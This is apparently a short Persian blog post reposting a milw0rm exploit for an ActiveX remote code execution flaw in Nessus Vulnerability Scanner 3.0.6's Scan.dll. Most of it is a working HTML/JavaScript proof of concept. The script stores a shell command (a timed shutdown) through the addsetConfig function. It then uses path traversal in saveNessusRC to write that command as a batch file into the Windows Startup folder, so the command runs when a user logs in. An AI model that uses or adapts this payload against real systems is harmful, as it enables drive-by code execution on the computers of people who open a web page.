وقتی خوشگل بابا گند میزند…
درود
گفتم شاید واستون جالب باشه!
Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Code Execution
در یک dll به نام Scan.dll آسیب پذیری مشاهده میشه!
Classid:A47D5315-321D-4DEE-9DB3-18438023193B
و در تابع addsetConfig میبینیم:
Function addsetConfig (
ByVal nessus_name As String ,
ByVal value As String ,
ByVal group As String
) As Integer
و همچنین در تابع saveNessusRC میبینیم:
Function saveNessusRC (
ByVal fullname As String
) As Integer
و حالا :
<-HTML>
<-object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B">
<-script language="javascript">
obj.addsetConfig(’shutdown -t 1000 -s -c “hello world ;]” && pause’, ”, ”);
obj.saveNessusRC(”../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat”);
<-/script>
<-/HTML>
منبع اکسپلویت میلورم بود ! …
نظرات شما باعث شادی روح آن مرحوم و تسلی خاطر بازماندگان است.
